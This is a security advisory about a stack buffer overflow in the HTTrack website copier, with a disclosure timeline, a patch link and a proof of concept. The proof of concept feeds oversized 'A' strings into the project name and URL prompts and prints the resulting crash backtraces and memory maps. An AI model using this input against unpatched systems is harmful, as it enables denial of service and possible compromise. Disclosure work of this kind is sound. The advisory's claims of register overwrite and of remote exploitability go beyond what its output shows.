HTTrack version 3.x suffers from a stack buffer overflow vulnerability.
c337772f7a80c6173d423d424a64e546
Document Title:
===============
HTTrack v3.x - Stack Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2068
Release Date:
=============
2017-05-22
Vulnerability Laboratory ID (VL-ID):
====================================
2068
Common Vulnerability Scoring System:
====================================
6.1
Vulnerability Class:
====================
Buffer Overflow
Product & Service Introduction:
===============================
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML,
images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page
of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can
also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack, and WebHTTrack the Linux/Unix/BSD release.
(Copy of the Homepage: http://www.httrack.com/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a stack buffer overflow in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows).
Vulnerability Disclosure Timeline:
==================================
2016-05-12: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-05-12: Vendor Notification (HTTrack Security Service Team)
2016-05-13: Vendor Response/Feedback (HTTrack Security Service Team)
2017-05-14: Vendor Fix/Patch (HTTrack Service Team)
2017-05-16: Security Acknowledgements (HTTrack Security Service Team)
2017-05-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Xavier Roche
Product: HTTrack Website Copier - Software (Linux & Windows) 3.48-22-1 (Fedora 25), v3.48-24 (Debian), v3.49.1 (Windows) & Android App
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows).
The vulnerability allows to overwrite the registers of the process to gain higher access privileges for compromise of the local computer system.
A buffer overflow in the `URI` and `Project Name` processing in `HTTrack` and `WebHTTrack` on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian),
allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large unicode strings. The vulnerability
is a classic unicode stack buffer overflow vulnerability in the software core. The vulnerability can be exploited by local attackers with
restricted system user privileges to compromise the software process to gain higher process access privileges. The issue allows to overwrite the
basic registers of the process like eip and ebx.
The security risk of the stack overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the stack buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction.
Successful exploitation of the stack overflow vulnerability results in process manipulation or compromise of the affected computer system.
Proof of Concept (PoC):
=======================
The stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- Wizard Command Line HTTRACK ---
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v
--- Backtrace ---
*** buffer overflow detected ***: httrack terminated
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
--- Memory Map ---
80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack
80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack
80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack
80007000-80050000 rw-p 00000000 00:00 0 [heap]
b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f5000-b7a3d000 rw-p 00000000 00:00 0
b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d13000-b7d16000 rw-p 00000000 00:00 0
b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecd000-b7ed0000 rw-p 00000000 00:00 0
b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb4000-b7fb6000 rw-p 00000000 00:00 0
b7fd4000-b7fd7000 rw-p 00000000 00:00 0
b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar]
b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso]
b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7ffd000-b7ffe000 rw-p 00000000 00:00 0
b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
-
Caught signal 6
httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
Please report the problem at http://forum.httrack.com
Aborted (core dumped)
--------------------
(gdb) run
Starting program: /usr/bin/httrack
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Welcome to HTTrack Website Copier (Offline Browser) 3.48-24
Copyright (C) 1998-2016 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help
Enter project name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Base path (return=/home/constantine/websites/) :
Enter URLs (separated by commas or blank spaces) :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Action:
(enter) 1 Mirror Web Site(s)
2 Mirror Web Site(s) with Wizard
3 Just Get Files Indicated
4 Mirror ALL links in URLs (Multiple Mirror)
5 Test Links In URLs (Bookmark Test)
0 Quit
:
: 1
Proxy (return=none) :
You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip
Wildcards (return=none) :
Additional options (return=none):
---> Wizard command line httrack ---
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v
--- Backtrace ---
*** buffer overflow detected ***: /usr/bin/httrack terminated
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
--- Memory map: ---
80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack
80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack
80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack
80007000-80050000 rw-p 00000000 00:00 0 [heap]
b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f5000-b7a3d000 rw-p 00000000 00:00 0
b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d13000-b7d16000 rw-p 00000000 00:00 0
b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecd000-b7ed0000 rw-p 00000000 00:00 0
b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb4000-b7fb6000 rw-p 00000000 00:00 0
b7fd4000-b7fd7000 rw-p 00000000 00:00 0
b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar]
b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso]
b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7ffd000-b7ffe000 rw-p 00000000 00:00 0
b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()
(gdb) continue
Continuing.
Caught signal 6
/usr/bin/httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
Please report the problem at http://forum.httrack.com
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()
Solution - Fix & Patch:
=======================
https://github.com/xroche/httrack/commit/d1dadb3f2ec3bb02f980974ca79ee66e5df34351
Note: A new 3.49.2 release has been submitted to Debian (sid), a new HTTrack version (WinHTTrack) and Android version.
The Debian security team has been informed, and should take the backport side
Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the software core is estimated as high (CVSS 6.1)
Credits & Authors:
==================
Hosein Askari (FarazPajohan) - [email protected] [https://www.vulnerability-lab.com/show.php?user=Hosein%20Askari]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com